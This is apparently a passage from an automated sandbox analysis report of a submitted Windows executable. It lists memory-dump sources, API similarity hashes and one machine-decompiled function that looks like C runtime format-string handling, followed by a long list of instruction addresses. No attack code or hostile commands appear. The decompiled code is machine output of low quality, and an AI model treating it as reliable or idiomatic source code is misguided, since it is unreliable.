                                                                                                                                                                                                                                                        0x7ff6e5ad3144
                                                                                                                                                                                                                                                        0x7ff6e5ad3147
                                                                                                                                                                                                                                                        0x7ff6e5ad314c
                                                                                                                                                                                                                                                        0x7ff6e5ad314c
                                                                                                                                                                                                                                                        0x7ff6e5ad3155
                                                                                                                                                                                                                                                        0x7ff6e5ad3162
                                                                                                                                                                                                                                                        0x7ff6e5ad3166
                                                                                                                                                                                                                                                        0x7ff6e5ad316b
                                                                                                                                                                                                                                                        0x7ff6e5ad3179
                                                                                                                                                                                                                                                        0x7ff6e5ad3182
                                                                                                                                                                                                                                                        0x7ff6e5ad3188
                                                                                                                                                                                                                                                        0x7ff6e5ad318e
                                                                                                                                                                                                                                                        0x7ff6e5ad3190
                                                                                                                                                                                                                                                        0x7ff6e5ad3196
                                                                                                                                                                                                                                                        0x7ff6e5ad31a0
                                                                                                                                                                                                                                                        0x7ff6e5ad31a4
                                                                                                                                                                                                                                                        0x7ff6e5ad31ab
                                                                                                                                                                                                                                                        0x7ff6e5ad31ad
                                                                                                                                                                                                                                                        0x7ff6e5ad31b1
                                                                                                                                                                                                                                                        0x7ff6e5ad31b6
                                                                                                                                                                                                                                                        0x7ff6e5ad31cb

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                        • Instruction ID: d48e9366063785d892c60afa6a6f8411270648a5272b204df8cce227d5f236e3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5FC1C272B1828687EB249F19A15876AB791FB88B88F458135DF4EC3744DE3EEC05CB44
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        • Opcode ID: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                                                                                                                                                                                                                        • Instruction ID: 7468316384476019a02d03bd67d8677b4bb6fb802d0ce0b08888b09b7dff1ef5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34bf4ba4d1f77b159a602f4f3a79dc58b46c4397abc6f90fe1b78d3c276b8e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2B12873604B898AEB159F2DC85636837A0FB84F48F158921DA5DC37A4CF3AD851CB05
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 61%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC2C04(long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8) {
                                                                                                                                                                                                                                                        				void* __rdi;
                                                                                                                                                                                                                                                        				void* _t124;
                                                                                                                                                                                                                                                        				signed int _t155;
                                                                                                                                                                                                                                                        				void* _t159;
                                                                                                                                                                                                                                                        				unsigned int _t164;
                                                                                                                                                                                                                                                        				signed char _t165;
                                                                                                                                                                                                                                                        				signed int _t168;
                                                                                                                                                                                                                                                        				signed short _t184;
                                                                                                                                                                                                                                                        				void* _t187;
                                                                                                                                                                                                                                                        				void* _t188;
                                                                                                                                                                                                                                                        				void* _t189;
                                                                                                                                                                                                                                                        				void* _t190;
                                                                                                                                                                                                                                                        				void* _t196;
                                                                                                                                                                                                                                                        				signed long long _t245;
                                                                                                                                                                                                                                                        				void* _t263;
                                                                                                                                                                                                                                                        				signed int** _t274;
                                                                                                                                                                                                                                                        				signed int** _t277;
                                                                                                                                                                                                                                                        				signed int** _t281;
                                                                                                                                                                                                                                                        				signed int*** _t283;
                                                                                                                                                                                                                                                        				signed long long _t288;
                                                                                                                                                                                                                                                        				signed int** _t293;
                                                                                                                                                                                                                                                        				void* _t295;
                                                                                                                                                                                                                                                        				signed int* _t296;
                                                                                                                                                                                                                                                        				long long _t300;
                                                                                                                                                                                                                                                        				void* _t303;
                                                                                                                                                                                                                                                        				signed long long _t304;
                                                                                                                                                                                                                                                        				void* _t306;
                                                                                                                                                                                                                                                        				void* _t312;
                                                                                                                                                                                                                                                        				signed long long _t316;
                                                                                                                                                                                                                                                        				void* _t318;
                                                                                                                                                                                                                                                        				signed int*** _t319;
                                                                                                                                                                                                                                                        				void* _t321;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t306 = __r8;
                                                                                                                                                                                                                                                        				_t298 = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t303 + 0x10)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t303 + 0x18)) = _t300;
                                                                                                                                                                                                                                                        				 *((long long*)(_t303 + 0x20)) = __rsi;
                                                                                                                                                                                                                                                        				_t304 = _t303 - 0x50;
                                                                                                                                                                                                                                                        				_t245 =  *0xe5aed018; // 0x33daea0d3843
                                                                                                                                                                                                                                                        				 *(_t304 + 0x40) = _t245 ^ _t304;
                                                                                                                                                                                                                                                        				_t263 = __rcx;
                                                                                                                                                                                                                                                        				_t155 =  *(__rcx + 0x3a) & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t6 = _t295 - 0x37; // 0x41
                                                                                                                                                                                                                                                        				_t188 = _t6;
                                                                                                                                                                                                                                                        				_t7 = _t295 - 0x20; // 0x58
                                                                                                                                                                                                                                                        				_t184 = _t7;
                                                                                                                                                                                                                                                        				_t189 = _t155 - 0x64;
                                                                                                                                                                                                                                                        				if (_t189 > 0) goto 0xe5ac2cb7;
                                                                                                                                                                                                                                                        				if (_t189 == 0) goto 0xe5ac2ce1;
                                                                                                                                                                                                                                                        				_t190 = _t155 - 0x53;
                                                                                                                                                                                                                                                        				if (_t190 > 0) goto 0xe5ac2c80;
                                                                                                                                                                                                                                                        				if (_t190 == 0) goto 0xe5ac2d27;
                                                                                                                                                                                                                                                        				if (_t190 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t190 == 0) goto 0xe5ac2c9b;
                                                                                                                                                                                                                                                        				if (_t190 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				_t159 = _t155 - _t188 - 0xffffffffffffffff;
                                                                                                                                                                                                                                                        				if (_t190 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t159 != 1) goto 0xe5ac2d50;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC33B8(0x78, __rcx, __rcx, _t300);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				if (_t159 == _t184) goto 0xe5ac2d3f;
                                                                                                                                                                                                                                                        				if (_t159 == 0x5a) goto 0xe5ac2caa;
                                                                                                                                                                                                                                                        				if (_t159 == 0x61) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t159 != 0x63) goto 0xe5ac2d50;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC36F4(_t159 - 0x63, __rcx, __rcx, __rsi, _t321, _t318);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC30E4(_t159, __rcx, __rcx, _t298, _t316);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				_t196 = _t159 - 0x6f;
                                                                                                                                                                                                                                                        				if (_t196 > 0) goto 0xe5ac2d10;
                                                                                                                                                                                                                                                        				if (_t196 == 0) goto 0xe5ac2cf1;
                                                                                                                                                                                                                                                        				if (_t196 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t196 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t196 == 0) goto 0xe5ac2c73;
                                                                                                                                                                                                                                                        				if (_t196 == 0) goto 0xe5ac2ce1;
                                                                                                                                                                                                                                                        				if (_t159 - 0x61 != 5) goto 0xe5ac2d50;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC37B8(__rcx, __rcx);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC0FB4(0, __rcx, __rcx, _t295, _t298, _t300, _t312, _t295);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				_t164 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				if ((_t164 >> 0x00000005 & 0x00000001) == 0) goto 0xe5ac2d04;
                                                                                                                                                                                                                                                        				asm("bts ecx, 0x7");
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t164;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC0BA4(0, __rcx, __rcx, _t295, _t298, _t300);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				if (_t164 == 0x70) goto 0xe5ac2d31;
                                                                                                                                                                                                                                                        				if (_t164 == 0x73) goto 0xe5ac2d27;
                                                                                                                                                                                                                                                        				if (_t164 == 0x75) goto 0xe5ac2ce5;
                                                                                                                                                                                                                                                        				if (_t164 != 0x78) goto 0xe5ac2d50;
                                                                                                                                                                                                                                                        				goto 0xe5ac2d41;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC390C(__rcx, __rcx, _t298);
                                                                                                                                                                                                                                                        				goto 0xe5ac2d49;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t263 + 0x30)) = 0x10;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t263 + 0x34)) = 0xb;
                                                                                                                                                                                                                                                        				_t124 = E00007FF67FF6E5AC13C4(1, _t263, _t263, _t295, _t298, _t300);
                                                                                                                                                                                                                                                        				r13d = 0;
                                                                                                                                                                                                                                                        				if (_t124 != 0) goto 0xe5ac2d57;
                                                                                                                                                                                                                                                        				goto 0xe5ac303d;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t263 + 0x38)) != r13b) goto 0xe5ac303b;
                                                                                                                                                                                                                                                        				_t165 =  *(_t263 + 0x28);
                                                                                                                                                                                                                                                        				 *(_t304 + 0x34) = 0;
                                                                                                                                                                                                                                                        				_t288 = _t316;
                                                                                                                                                                                                                                                        				 *((short*)(_t304 + 0x38)) = 0;
                                                                                                                                                                                                                                                        				r12d = 0x20;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac2db5;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac2d96;
                                                                                                                                                                                                                                                        				_t24 = _t312 + 0xd; // 0xd
                                                                                                                                                                                                                                                        				 *(_t304 + 0x34) = _t24;
                                                                                                                                                                                                                                                        				goto 0xe5ac2db0;
                                                                                                                                                                                                                                                        				if ((_t165 & 0x00000001) == 0) goto 0xe5ac2da2;
                                                                                                                                                                                                                                                        				goto 0xe5ac2d8f;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac2db5;
                                                                                                                                                                                                                                                        				 *(_t304 + 0x34) = r12w;
                                                                                                                                                                                                                                                        				r8d =  *(_t263 + 0x3a) & 0x0000ffff;
                                                                                                                                                                                                                                                        				r10d = 0xffdf;
                                                                                                                                                                                                                                                        				if ((r10w & (r8w & 0xffffffff) - _t184) != 0) goto 0xe5ac2dd9;
                                                                                                                                                                                                                                                        				r9b = 1;
                                                                                                                                                                                                                                                        				if (0 != 0) goto 0xe5ac2ddc;
                                                                                                                                                                                                                                                        				r9b = r13b;
                                                                                                                                                                                                                                                        				r15d = 0x30;
                                                                                                                                                                                                                                                        				if (r9b != 0) goto 0xe5ac2df9;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac2e17;
                                                                                                                                                                                                                                                        				 *(_t304 + 0x34 + _t288 * 2) = r15w;
                                                                                                                                                                                                                                                        				if (r8w == _t184) goto 0xe5ac2e0b;
                                                                                                                                                                                                                                                        				if (r8w != _t188) goto 0xe5ac2e0e;
                                                                                                                                                                                                                                                        				 *((short*)(_t304 + 0x36 + _t288 * 2)) = _t184 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t187 =  *((intOrPtr*)(_t263 + 0x2c)) - 1 -  *(_t263 + 0x48);
                                                                                                                                                                                                                                                        				if ((_t165 & 0x0000000c) != 0) goto 0xe5ac2e8b;
                                                                                                                                                                                                                                                        				r9d = r13d;
                                                                                                                                                                                                                                                        				if (_t187 <= 0) goto 0xe5ac2e8b;
                                                                                                                                                                                                                                                        				r8d =  *(_t263 + 0x20);
                                                                                                                                                                                                                                                        				_t274 =  *(_t263 + 0x460);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t274 + 0x10)) !=  *((intOrPtr*)(_t274 + 8))) goto 0xe5ac2e55;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t274 + 0x18)) == r13b) goto 0xe5ac2e4b;
                                                                                                                                                                                                                                                        				r8d = r8d + 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac2e4f;
                                                                                                                                                                                                                                                        				r8d = r8d | 0xffffffff;
                                                                                                                                                                                                                                                        				 *(_t263 + 0x20) = r8d;
                                                                                                                                                                                                                                                        				goto 0xe5ac2e79;
                                                                                                                                                                                                                                                        				 *(_t263 + 0x20) = _t306 + 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t274 + 0x10)) =  *((long long*)(_t274 + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *(_t263 + 0x460))) = r12w;
                                                                                                                                                                                                                                                        				 *( *(_t263 + 0x460)) =  &(( *( *(_t263 + 0x460)))[0]);
                                                                                                                                                                                                                                                        				r8d =  *(_t263 + 0x20);
                                                                                                                                                                                                                                                        				if (r8d == 0xffffffff) goto 0xe5ac2e8b;
                                                                                                                                                                                                                                                        				r9d = r9d + 1;
                                                                                                                                                                                                                                                        				if (r9d - _t187 < 0) goto 0xe5ac2e2f;
                                                                                                                                                                                                                                                        				_t296 = _t263 + 0x20;
                                                                                                                                                                                                                                                        				r8d = 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t304 + 0x20)) =  *((intOrPtr*)(_t263 + 8));
                                                                                                                                                                                                                                                        				_t319 = _t263 + 0x460;
                                                                                                                                                                                                                                                        				_t67 = _t304 + 0x34; // 0x54
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3B3C(_t306 + 1, _t187, _t263, _t319, _t298, _t300, _t296);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac2f16;
                                                                                                                                                                                                                                                        				if (( *(_t263 + 0x28) >> 0x00000002 & 0x00000001) != 0) goto 0xe5ac2f16;
                                                                                                                                                                                                                                                        				r8d = r13d;
                                                                                                                                                                                                                                                        				if (_t187 <= 0) goto 0xe5ac2f16;
                                                                                                                                                                                                                                                        				_t277 =  *_t319;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t277 + 0x10)) !=  *((intOrPtr*)(_t277 + 8))) goto 0xe5ac2eed;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t277 + 0x18)) == r13b) goto 0xe5ac2ee6;
                                                                                                                                                                                                                                                        				goto 0xe5ac2ee9;
                                                                                                                                                                                                                                                        				 *_t296 =  *_t296 + 0x00000001 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2f07;
                                                                                                                                                                                                                                                        				 *_t296 = _t67 + 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t277 + 0x10)) =  *((long long*)(_t277 + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *_t319)) = r15w;
                                                                                                                                                                                                                                                        				 *( *_t319) =  &(( *( *_t319))[0]);
                                                                                                                                                                                                                                                        				if ( *_t296 == 0xffffffff) goto 0xe5ac2f16;
                                                                                                                                                                                                                                                        				r8d = r8d + 1;
                                                                                                                                                                                                                                                        				if (r8d - _t187 < 0) goto 0xe5ac2ecf;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t263 + 0x4c)) != r13b) goto 0xe5ac2fed;
                                                                                                                                                                                                                                                        				if ( *(_t263 + 0x48) - r13d <= 0) goto 0xe5ac2fed;
                                                                                                                                                                                                                                                        				_t301 =  *((intOrPtr*)(_t263 + 8));
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t263 + 8)) + 0x28)) != r13b) goto 0xe5ac2f3c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3A20( *_t319, _t263,  *((intOrPtr*)(_t263 + 8)), _t298);
                                                                                                                                                                                                                                                        				r15d = r13d;
                                                                                                                                                                                                                                                        				if ( *(_t263 + 0x48) == r13d) goto 0xe5ac2fb4;
                                                                                                                                                                                                                                                        				_t86 = _t304 + 0x30; // 0x50
                                                                                                                                                                                                                                                        				 *(_t304 + 0x30) = r13w;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5ACDBB0( *(_t263 + 0x28) >> 2, _t188, _t263, _t86,  *((intOrPtr*)(_t263 + 0x40)), _t296, _t298, _t301,  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x18)) + 8)),  *((intOrPtr*)(_t263 + 8))) <= 0) goto 0xe5ac2fe8;
                                                                                                                                                                                                                                                        				_t281 =  *_t319;
                                                                                                                                                                                                                                                        				r8d =  *(_t304 + 0x30) & 0x0000ffff;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t281 + 0x10)) !=  *((intOrPtr*)(_t281 + 8))) goto 0xe5ac2f91;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t281 + 0x18)) == r13b) goto 0xe5ac2f8c;
                                                                                                                                                                                                                                                        				 *_t296 =  *_t296 + 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac2fa8;
                                                                                                                                                                                                                                                        				 *_t296 =  *_t296 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2fa8;
                                                                                                                                                                                                                                                        				 *_t296 =  *_t296 + 1;
                                                                                                                                                                                                                                                        				 *((long long*)(_t281 + 0x10)) =  *((long long*)(_t281 + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *_t319)) = r8w;
                                                                                                                                                                                                                                                        				 *( *_t319) =  &(( *( *_t319))[0]);
                                                                                                                                                                                                                                                        				r15d = r15d + 1;
                                                                                                                                                                                                                                                        				if (r15d !=  *(_t263 + 0x48)) goto 0xe5ac2f49;
                                                                                                                                                                                                                                                        				r12d = 0x20;
                                                                                                                                                                                                                                                        				_t168 =  *_t296;
                                                                                                                                                                                                                                                        				if (_t168 < 0) goto 0xe5ac303b;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac303b;
                                                                                                                                                                                                                                                        				r8d = r13d;
                                                                                                                                                                                                                                                        				if (_t187 <= 0) goto 0xe5ac303b;
                                                                                                                                                                                                                                                        				_t293 =  *_t319;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t293 + 0x10)) !=  *((intOrPtr*)(_t293 + 8))) goto 0xe5ac3012;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t293 + 0x18)) == r13b) goto 0xe5ac300b;
                                                                                                                                                                                                                                                        				goto 0xe5ac300e;
                                                                                                                                                                                                                                                        				 *_t296 =  *_t296 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac2fb4;
                                                                                                                                                                                                                                                        				r8d =  *(_t263 + 0x48);
                                                                                                                                                                                                                                                        				_t283 = _t319;
                                                                                                                                                                                                                                                        				 *((long long*)(_t304 + 0x20)) =  *((intOrPtr*)(_t263 + 8));
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC3B3C( *(_t263 + 0x28) >> 2, _t187, _t263, _t283, _t298, _t301, _t296);
                                                                                                                                                                                                                                                        				goto 0xe5ac2fba;
                                                                                                                                                                                                                                                        				 *_t296 = _t168 + 0x00000001 | 0xffffffff;
                                                                                                                                                                                                                                                        				goto 0xe5ac302c;
                                                                                                                                                                                                                                                        				 *_t296 =  &(_t283[0]);
                                                                                                                                                                                                                                                        				 *((long long*)( *((intOrPtr*)(_t263 + 0x40)) + 0x10)) =  *((long long*)( *((intOrPtr*)(_t263 + 0x40)) + 0x10)) + 1;
                                                                                                                                                                                                                                                        				 *( *( *_t319)) = r12w;
                                                                                                                                                                                                                                                        				 *( *_t319) =  &(( *( *_t319))[0]);
                                                                                                                                                                                                                                                        				if ( *_t296 == 0xffffffff) goto 0xe5ac303b;
                                                                                                                                                                                                                                                        				r8d = r8d + 1;
                                                                                                                                                                                                                                                        				if (r8d - _t187 < 0) goto 0xe5ac2fd1;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5ABAD80(1,  *_t296,  *(_t304 + 0x40) ^ _t304);
                                                                                                                                                                                                                                                        			}



































                                                                                                                                                                                                                                                        0x7ff6e5ac2c04
                                                                                                                                                                                                                                                        0x7ff6e5ac2c04
                                                                                                                                                                                                                                                        0x7ff6e5ac2c04
                                                                                                                                                                                                                                                        0x7ff6e5ac2c09
                                                                                                                                                                                                                                                        0x7ff6e5ac2c0e
                                                                                                                                                                                                                                                        0x7ff6e5ac2c1c
                                                                                                                                                                                                                                                        0x7ff6e5ac2c20
                                                                                                                                                                                                                                                        0x7ff6e5ac2c2a
                                                                                                                                                                                                                                                        0x7ff6e5ac2c34
                                                                                                                                                                                                                                                        0x7ff6e5ac2c37
                                                                                                                                                                                                                                                        0x7ff6e5ac2c3b
                                                                                                                                                                                                                                                        0x7ff6e5ac2c3b
                                                                                                                                                                                                                                                        0x7ff6e5ac2c3e
                                                                                                                                                                                                                                                        0x7ff6e5ac2c3e
                                                                                                                                                                                                                                                        0x7ff6e5ac2c41
                                                                                                                                                                                                                                                        0x7ff6e5ac2c44
                                                                                                                                                                                                                                                        0x7ff6e5ac2c46
                                                                                                                                                                                                                                                        0x7ff6e5ac2c4c
                                                                                                                                                                                                                                                        0x7ff6e5ac2c4f
                                                                                                                                                                                                                                                        0x7ff6e5ac2c51
                                                                                                                                                                                                                                                        0x7ff6e5ac2c59
                                                                                                                                                                                                                                                        0x7ff6e5ac2c5e
                                                                                                                                                                                                                                                        0x7ff6e5ac2c63
                                                                                                                                                                                                                                                        0x7ff6e5ac2c65
                                                                                                                                                                                                                                                        0x7ff6e5ac2c68
                                                                                                                                                                                                                                                        0x7ff6e5ac2c6d
                                                                                                                                                                                                                                                        0x7ff6e5ac2c76
                                                                                                                                                                                                                                                        0x7ff6e5ac2c7b
                                                                                                                                                                                                                                                        0x7ff6e5ac2c82
                                                                                                                                                                                                                                                        0x7ff6e5ac2c8b
                                                                                                                                                                                                                                                        0x7ff6e5ac2c90
                                                                                                                                                                                                                                                        0x7ff6e5ac2c95
                                                                                                                                                                                                                                                        0x7ff6e5ac2ca0
                                                                                                                                                                                                                                                        0x7ff6e5ac2ca5
                                                                                                                                                                                                                                                        0x7ff6e5ac2cad
                                                                                                                                                                                                                                                        0x7ff6e5ac2cb2
                                                                                                                                                                                                                                                        0x7ff6e5ac2cb7
                                                                                                                                                                                                                                                        0x7ff6e5ac2cba
                                                                                                                                                                                                                                                        0x7ff6e5ac2cbc
                                                                                                                                                                                                                                                        0x7ff6e5ac2cc1
                                                                                                                                                                                                                                                        0x7ff6e5ac2cc6
                                                                                                                                                                                                                                                        0x7ff6e5ac2ccb
                                                                                                                                                                                                                                                        0x7ff6e5ac2cd0
                                                                                                                                                                                                                                                        0x7ff6e5ac2cd5
                                                                                                                                                                                                                                                        0x7ff6e5ac2cda
                                                                                                                                                                                                                                                        0x7ff6e5ac2cdf
                                                                                                                                                                                                                                                        0x7ff6e5ac2ce1
                                                                                                                                                                                                                                                        0x7ff6e5ac2cea
                                                                                                                                                                                                                                                        0x7ff6e5ac2cef
                                                                                                                                                                                                                                                        0x7ff6e5ac2cf1
                                                                                                                                                                                                                                                        0x7ff6e5ac2cfb
                                                                                                                                                                                                                                                        0x7ff6e5ac2cfd
                                                                                                                                                                                                                                                        0x7ff6e5ac2d01
                                                                                                                                                                                                                                                        0x7ff6e5ac2d09
                                                                                                                                                                                                                                                        0x7ff6e5ac2d0e
                                                                                                                                                                                                                                                        0x7ff6e5ac2d13
                                                                                                                                                                                                                                                        0x7ff6e5ac2d18
                                                                                                                                                                                                                                                        0x7ff6e5ac2d1d
                                                                                                                                                                                                                                                        0x7ff6e5ac2d21
                                                                                                                                                                                                                                                        0x7ff6e5ac2d25
                                                                                                                                                                                                                                                        0x7ff6e5ac2d2a
                                                                                                                                                                                                                                                        0x7ff6e5ac2d2f
                                                                                                                                                                                                                                                        0x7ff6e5ac2d31
                                                                                                                                                                                                                                                        0x7ff6e5ac2d38
                                                                                                                                                                                                                                                        0x7ff6e5ac2d44
                                                                                                                                                                                                                                                        0x7ff6e5ac2d49
                                                                                                                                                                                                                                                        0x7ff6e5ac2d4e
                                                                                                                                                                                                                                                        0x7ff6e5ac2d52
                                                                                                                                                                                                                                                        0x7ff6e5ac2d5b
                                                                                                                                                                                                                                                        0x7ff6e5ac2d61
                                                                                                                                                                                                                                                        0x7ff6e5ac2d66
                                                                                                                                                                                                                                                        0x7ff6e5ac2d6a
                                                                                                                                                                                                                                                        0x7ff6e5ac2d6d
                                                                                                                                                                                                                                                        0x7ff6e5ac2d72
                                                                                                                                                                                                                                                        0x7ff6e5ac2d7f
                                                                                                                                                                                                                                                        0x7ff6e5ac2d88
                                                                                                                                                                                                                                                        0x7ff6e5ac2d8a
                                                                                                                                                                                                                                                        0x7ff6e5ac2d8f
                                                                                                                                                                                                                                                        0x7ff6e5ac2d94
                                                                                                                                                                                                                                                        0x7ff6e5ac2d99
                                                                                                                                                                                                                                                        0x7ff6e5ac2da0
                                                                                                                                                                                                                                                        0x7ff6e5ac2da8
                                                                                                                                                                                                                                                        0x7ff6e5ac2daa
                                                                                                                                                                                                                                                        0x7ff6e5ac2db5
                                                                                                                                                                                                                                                        0x7ff6e5ac2dba
                                                                                                                                                                                                                                                        0x7ff6e5ac2dcb
                                                                                                                                                                                                                                                        0x7ff6e5ac2dcf
                                                                                                                                                                                                                                                        0x7ff6e5ac2dd7
                                                                                                                                                                                                                                                        0x7ff6e5ac2dd9
                                                                                                                                                                                                                                                        0x7ff6e5ac2de0
                                                                                                                                                                                                                                                        0x7ff6e5ac2df3
                                                                                                                                                                                                                                                        0x7ff6e5ac2df7
                                                                                                                                                                                                                                                        0x7ff6e5ac2df9
                                                                                                                                                                                                                                                        0x7ff6e5ac2e03
                                                                                                                                                                                                                                                        0x7ff6e5ac2e09
